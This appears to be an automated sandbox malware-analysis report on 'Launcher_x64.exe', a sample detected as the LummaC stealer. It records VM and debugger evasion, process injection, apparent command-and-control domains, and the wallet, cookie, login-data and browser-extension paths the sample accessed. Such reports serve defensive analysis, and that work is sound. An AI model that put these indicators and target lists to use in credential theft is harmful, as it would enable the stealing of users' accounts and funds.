                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Launcher_x64.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                Source: Launcher_x64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Launcher_x64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Launcher_x64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Launcher_x64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Launcher_x64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D167C3 push ecx; ret 0_2_00D167D6
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D167C3 push ecx; ret 2_2_00D167D6
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0043D990 push eax; mov dword ptr [esp], E9E8E7B6h3_2_0043D995
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00443B71 pushfd ; iretd 3_2_00443B9E
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0043AD00 push eax; mov dword ptr [esp], 898A8B8Ch3_2_0043AD0F
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\Launcher_x64.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-21816
                Source: C:\Users\user\Desktop\Launcher_x64.exe TID: 5928Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exe TID: 5928Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D29126 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00D29126
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D29075 FindFirstFileExW,2_2_00D29075
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D29126 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00D29126
                Source: Launcher_x64.exe, 00000003.00000003.2456444244.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2603116855.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2610718575.000000000100E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWW
                Source: Launcher_x64.exe, 00000003.00000003.2456444244.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2603116855.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2610718575.000000000100E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Launcher_x64.exeBinary or memory string: VMCIH
                Source: Launcher_x64.exe, 00000003.00000002.2610718575.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPx
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0043C390 LdrInitializeThunk,3_2_0043C390
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D1F2B0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D1F2B0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D3F19E mov edi, dword ptr fs:[00000030h]0_2_00D3F19E
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D016C0 mov edi, dword ptr fs:[00000030h]0_2_00D016C0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D016C0 mov edi, dword ptr fs:[00000030h]2_2_00D016C0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D24ABC GetProcessHeap,0_2_00D24ABC
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D1616C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D1616C
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D1F2B0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D1F2B0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D1651C SetUnhandledExceptionFilter,0_2_00D1651C
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D16528 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D16528
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D1616C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00D1616C
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D1F2B0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D1F2B0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D1651C SetUnhandledExceptionFilter,2_2_00D1651C
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D16528 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D16528

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Contains functionality to inject code into remote processes
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D3F19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00D3F19E
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Launcher_x64.exeMemory written: C:\Users\user\Desktop\Launcher_x64.exe base: 400000 value starts with: 4D5AJump to behavior
                LummaC encrypted strings found
                Source: Launcher_x64.exe, 00000000.00000002.1731377519.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: steppriflej.xyz
                Source: Launcher_x64.exe, 00000000.00000002.1731377519.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sendypaster.xyz
                Source: Launcher_x64.exe, 00000000.00000002.1731377519.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: bellflamre.click
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00D283DF
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,0_2_00D243A7
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00D286CB
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,0_2_00D28630
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,0_2_00D2897D
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,0_2_00D2891E
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,0_2_00D28A9D
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,0_2_00D28A52
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00D28B44
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,0_2_00D28C4A
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,0_2_00D23EAC
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00D283DF
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,2_2_00D243A7
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00D286CB
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,2_2_00D28630
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,2_2_00D2897D
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,2_2_00D2891E
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,2_2_00D28A9D
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,2_2_00D28A52
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00D28B44
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,2_2_00D28C4A
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,2_2_00D23EAC
                Source: C:\Users\user\Desktop\Launcher_x64.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D17110 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00D17110
                Source: C:\Users\user\Desktop\Launcher_x64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Launcher_x64.exe, 00000003.00000002.2610718575.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\Launcher_x64.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: 00000003.00000003.2556263712.0000000001093000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2602917926.0000000001093000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2611002767.0000000001073000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2555293768.0000000001093000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Launcher_x64.exe PID: 3336, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: Launcher_x64.exe, 00000003.00000002.2611002767.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                Source: Launcher_x64.exe, 00000003.00000002.2611002767.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: Launcher_x64.exe, 00000003.00000003.2530449435.000000000102B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: Launcher_x64.exe, 00000003.00000002.2611002767.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Launcher_x64.exe, 00000003.00000003.2530628830.000000000103B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: Launcher_x64.exe, 00000003.00000003.2530449435.000000000102B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                Source: Launcher_x64.exe, 00000003.00000002.2611002767.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: Launcher_x64.exe, 00000003.00000003.2530449435.000000000102B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Launcher_x64.exe, 00000003.00000003.2530449435.000000000102B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
